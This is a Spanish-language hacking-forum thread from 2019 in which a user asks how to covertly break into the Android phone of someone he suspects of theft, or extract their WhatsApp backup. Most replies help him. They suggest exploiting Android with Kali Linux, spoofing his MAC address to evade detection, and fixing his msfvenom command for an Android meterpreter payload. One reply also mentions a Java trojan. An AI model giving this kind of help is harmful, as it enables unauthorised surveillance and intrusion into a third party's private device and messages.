Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: misterguapo30 en 19 Julio 2019, 22:28 pm



Título: Acceder a un dispositivo android de mi red local
Publicado por: misterguapo30 en 19 Julio 2019, 22:28 pm
Buenas, se que diga lo que diga no me vais a creer. Pero tengo que intentarlo y único que os puedo decir que lo que la digo es la verdad.

El tema es que me desapareció un juego de herramientas de taller y sospecho de una persona que conecta su móvil a mi red local.

Tengo la oportunidad de realizarlo de dos manera.

1. Con kali linux acceder al dispositivo android hackeandolo

2.  tengo acceso al correo dispositivo cómplice con copia de seguridad de whassap

si instalo en una máquina virtual de android. El correo donde está la copia de seguridad. ¿Puedo extrale los mensajes deugassap?

Gracias3


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: @XSStringManolo en 20 Julio 2019, 00:16 am
Sí te creo pero es ilegal lo que propones.


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: nightcode en 21 Julio 2019, 01:36 am
puedes hacerlo y dudo que la persona como tal se de cuenta si lo haces bien... recomiendo cambiar la mac antes de hacerlo ocultar tu mac original.


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: misterguapo30 en 21 Julio 2019, 02:37 am
Pero ¿como puedo hacerlo sin tocar el movil victima?
Sobre la mac da igual porque la victima no tiene conocimiento informáticos y estoy en lo cierto yo mismo se lo voy a decir.

Gracias de antemano toda la ayuda que ma proporcionéis


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: nightcode en 21 Julio 2019, 02:54 am
Pero ¿como puedo hacerlo sin tocar el movil victima?
Sobre la mac da igual porque la victima no tiene conocimiento informáticos y estoy en lo cierto yo mismo se lo voy a decir.

Gracias de antemano toda la ayuda que ma proporcionéis

puedes ingresar al movil de la victima con kali linux explotando vulnerabilidades en el sistema operativo android. y una vez dentro del android a travez de tu computadora usmear chekear y verificar lo que nesecites del movil de la victima. asi como copiar archivos registros etc. para ello te recomiendo visualizar un video de youtube y buscar como hackear dispositivo android con kali linux y por hay te ubicas mejor


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: misterguapo30 en 23 Julio 2019, 14:08 pm
Buenas, he descubierto que con el programa armitage creo que voy por buen camino
 ¿no?.

Pero llego ha tener el listado de todos los dispositivos,, pero no como abrirlos.

pero tambien tengo dos fallitos que no como solucionar del metesploit

1.

root@kali:~# sudo service metasploit start
Failed to start metasploit.service: Unit metasploit.service not found.
 

2.

root@kali:~# msfvenom -p android/meterpreter/server_tcp lhost=192.168.0.109 lport=4567 R > /root/Escritorio/practicas/001.ap k
Error: Invalid Payload Selected

¿me podréis hechar una mano? por favor

Gracias


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: @XSStringManolo en 23 Julio 2019, 14:38 pm
Pufff que complicación de vida te estás haciendo con lo fácil que es sin necesidad de exploitear ninguna vulnerabilidad xDDD

Pal primer comando corre el servicio de postcresql y para el segundo tienes un espacio en el nombre de extensión .apk


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: misterguapo30 en 23 Julio 2019, 16:26 pm
Quitando el espacio. sigue igual.

root@kali:~# msfvenom -p android/meterpreter/server_tcp lhost=192.168.0.109 lport=4567 R > /root/Escritorio/practicas/001.apk
Error: Invalid Payload Selected


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: @XSStringManolo en 23 Julio 2019, 16:51 pm
Te dice que no hay ningún payload en esa carpeta. Revisa bién en donde están y pon la ruta correcta. O pega el payload en la ruta del comando con el nombre correspondiente.


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: misterguapo30 en 25 Julio 2019, 00:28 am
Siento molestaros de nuevo. Pero necesito que me dejéis claro  que si es posible sin crear un apk y sin enviarlo al móvil victima.

Es imposible hackearlo¡.

Si esto es cierto creo que voy desistir y seguir con mis proyectos.

Gracias


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: UnaiiM en 26 Julio 2019, 09:36 am
Uf que tiempo....
Bueno yo hace tiempo tenia la misma duda que me la soluciono rub'n.
Bueno se trata de conectar mediante sockets el móvil con tu Mac.
Investiga me recomendó un código (la verdad no sé qué es no se de qué lenguaje se trata xD supongo que C++) se llama JSocket.
Saludos !

PD: entre las vacaciones y todo me he desconectado bastante en el tema hacking y me vicie a los videojuegos,...


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: @XSStringManolo en 26 Julio 2019, 13:04 pm
Jsockets creo que es javascript(json) y Python. Se puede usar solo javascript con node.js


Título: Re: Acceder a un dispositivo android de mi red local
Publicado por: rub'n en 26 Julio 2019, 14:05 pm
Jsockets creo que es javascript(json) y Python. Se puede usar solo javascript con node.js

Así parece dog, en realidad es un troyano multiplataforma en Java y bastante estable, el source no está por ahí, no lo he visto, seguro sobraran servers eso sí.